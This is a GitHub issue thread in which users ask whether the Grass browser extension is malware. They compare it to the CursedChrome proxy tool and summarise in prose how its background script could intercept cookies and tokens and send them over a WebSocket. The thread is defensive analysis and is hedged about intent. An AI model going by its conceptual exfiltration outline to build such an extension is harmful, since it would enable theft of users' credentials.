Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Malware? #1

Open
DearGods opened this issue Jun 23, 2024 · 3 comments
Open

Malware? #1

DearGods opened this issue Jun 23, 2024 · 3 comments

Comments

@DearGods
Copy link

Hi @SunsetMkt

Check this

// the CursedChrome server with a HTTPS cert setup.

It seems like this https://github.com/mandatoryprogrammer/CursedChrome

So grass is malware?!

@SunsetMkt
Copy link
Owner

SunsetMkt commented Jun 23, 2024

Actually, I've never read the code, but since you highlight the CursedChrome...

What Grass does is share your internet connection (to collect information for AI, according to their statement) with their server. It's possible (and reasonable by some means) that they could use your device as an HTTP proxy to achieve that.

The (might) malicious part is that CursedChrome may connect to your local network, and if you install it on a company computer, the request will be sent from a trusted computer. Also, the host_permissions is "<all_urls>", which might mean that Grass has access to all host data, such as cookies, webRequest, and tabs (but there are some that it can not access). It may have too many permissions, although it has to have so many permissions to do its work.

I suggest reading the whole code by yourself and doing the same to the latest version of the extension. For myself, I only install unknown extensions on an isolated browser.

@scientgg
Copy link

To Whom it may concern:
script: background.js

  1. Cookie Access and Exfiltration:
    Cookie Handling:
    The script processes cookies directly by intercepting HTTP requests and responses using the chrome.webRequest API. It specifically extracts Set-Cookie headers from HTTP responses via the extractCookies function and stores them temporarily in CustomStorage.
    The getResponseCookies and setResponseCookies functions in the ResponseProcessor class manage cookies and can potentially send these cookies via the WebSocket connection to the remote server.
  2. HTTP Request Interception:
    Custom Header Manipulation:

The script can modify HTTP request headers using the performHttpRequest function. This includes headers that may carry authentication tokens, session IDs, or other sensitive information.
By altering or injecting specific headers, the script could redirect or modify requests to gather sensitive information.
Logging and Transport:

Logs generated within the script, including potentially sensitive data, can be sent to a remote server using the LogsTransporter.sendLogs() function over a WebSocket connection. This means that any intercepted data, including cookies or other sensitive headers, can be exfiltrated.
3. Local Storage Access:
Storage of Sensitive Data:
The script accesses Chrome's localStorage for storing and retrieving data like user IDs, JWT tokens, and other identifiers. If these tokens or identifiers are related to authentication, they could be used to impersonate a user or access restricted resources.
4. WebSocket Communication:
Data Transmission:
The script is designed to maintain an active WebSocket connection to a remote server. Through this connection, it can send and receive various data, including potentially sensitive information that it has intercepted.
Conclusion:
Capability of Stealing Information: The script has the technical capability to steal cookies, passwords, or other sensitive information through its handling of HTTP requests, cookies, and local storage data. The WebSocket communication mechanism can be used to exfiltrate this information to a remote server.

Trust and Intent: Whether the script actually does this depends on the intent of the developers and the specific configuration of the Grass extension. If the app is designed and implemented with malicious intent, it could be used to steal sensitive data.

@DearGods
Copy link
Author

To Whom it may concern: script: background.js

  1. Cookie Access and Exfiltration:
    Cookie Handling:
    The script processes cookies directly by intercepting HTTP requests and responses using the chrome.webRequest API. It specifically extracts Set-Cookie headers from HTTP responses via the extractCookies function and stores them temporarily in CustomStorage.
    The getResponseCookies and setResponseCookies functions in the ResponseProcessor class manage cookies and can potentially send these cookies via the WebSocket connection to the remote server.
  2. HTTP Request Interception:
    Custom Header Manipulation:

The script can modify HTTP request headers using the performHttpRequest function. This includes headers that may carry authentication tokens, session IDs, or other sensitive information. By altering or injecting specific headers, the script could redirect or modify requests to gather sensitive information. Logging and Transport:

Logs generated within the script, including potentially sensitive data, can be sent to a remote server using the LogsTransporter.sendLogs() function over a WebSocket connection. This means that any intercepted data, including cookies or other sensitive headers, can be exfiltrated. 3. Local Storage Access: Storage of Sensitive Data: The script accesses Chrome's localStorage for storing and retrieving data like user IDs, JWT tokens, and other identifiers. If these tokens or identifiers are related to authentication, they could be used to impersonate a user or access restricted resources. 4. WebSocket Communication: Data Transmission: The script is designed to maintain an active WebSocket connection to a remote server. Through this connection, it can send and receive various data, including potentially sensitive information that it has intercepted. Conclusion: Capability of Stealing Information: The script has the technical capability to steal cookies, passwords, or other sensitive information through its handling of HTTP requests, cookies, and local storage data. The WebSocket communication mechanism can be used to exfiltrate this information to a remote server.

Trust and Intent: Whether the script actually does this depends on the intent of the developers and the specific configuration of the Grass extension. If the app is designed and implemented with malicious intent, it could be used to steal sensitive data.

Hi @scientgg awesome analysis, might want to checkout https://github.com/security-chad/extension-analysis , it seems like Grass are messing with fire.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants